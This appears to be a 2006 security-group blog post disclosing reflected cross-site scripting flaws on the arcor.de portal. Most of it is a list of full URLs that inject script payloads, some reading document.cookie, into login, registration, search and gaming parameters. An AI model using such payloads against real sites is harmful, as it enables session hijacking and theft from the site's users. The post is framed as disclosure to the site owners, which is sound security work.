by r0t,der4444,cembo,VietMafia

Wednesday, March 29, 2006

arcor.de multiple XSS vuln.

here will be few examples of them that portal contains more than 100 xss vulns. so i dont post all examples here.

https://www.arcor.de/netpass/home.jsp?username=
%22%3Cscript%3Ealert%28document.cookie%29%3C%2
Fscript%3E&password=r0t&login.x=40&login.y=11

https://www.arcor.de/netpass/home.jsp?username=r0t
&password=%22%3Cscript%3Ealert%28document.cookie
%29%3C%2Fscript%3E&login.x=40&login.y=11


https://www.arcor.de/netpass/einrichten.jsp?username
=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
&password=r0t&password2=r0t&speichern.x=55&speich
ern.y=11


https://www.arcor.de/netpass/einrichten.jsp?username
=r0t&password=%22%3Cscript%3Ealert(document.cookie)%3
C/script%3E&password2=r0t&speichern.x=55&speichern.y=11

https://www.arcor.de/netpass/einrichten.jsp?username=
r0t&password=r0t&password2=%22%3Cscript%3Ealert(docum
ent.cookie)%3C/script%3E&speichern.x=55&speichern.y=11



http://www.arcor.de/content/srearchresult.jsp?Keywords=
Auto&teaser=1&scategorytype=web&searchID1=&searchID2=
&naviID=%22%3Cscript%3Ealert('r0t')%3C/script%3E


http://www.arcor.de/content/srearchresult.jsp?Keywords=
Auto&teaser=1&scategorytype=web&searchID1=&searchID2=%2
2%3Cscript%3Ealert('r0t')%3C/script%3E


http://www.arcor.de/content/srearchresult.jsp?Keywords=
Auto&teaser=1&scategorytype=web&searchID1=%22%3Cscript%
3Ealert('r0t')%3C/script%3E

http://www.arcor.de/login/login.jsp?goto=/tp/chatuser/?
channel=%22%3Cscript%3Ealert('r0t')%3C/script%3E


http://www.arcor.de/login/login.jsp?goto=%22%3Cscript%3Ea
lert('r0t')%3C/script%3E

http://www.arcor.de/gaming/login.jsp?goto=/gaming/highs
core.jsp%3Fplay=go%26gameID=%22%3Cscript%3Ealert('r0t')%3
C/script%3E

http://www.arcor.de/gaming/login.jsp?goto=/gaming/highscor
e.jsp%3Fplay=%22%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.arcor.de/gaming/login.jsp?goto=%22%3Cscript%3Ea
lert('r0t')%3C/script%3E

http://www.arcor.de/tophopp/topflop.jsp?typ=%22%3Cscript%3
Ealert('r0t')%3C/script%3E

http://www.arcor.de/login/login.jsp?goto=%22%3Cscript%3Eale
rt('r0t')%3C/script%3E


If my report are reading arcor coders or project owners, and will get full list of vuln. you can contact me via th3cracker at gmail.com

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew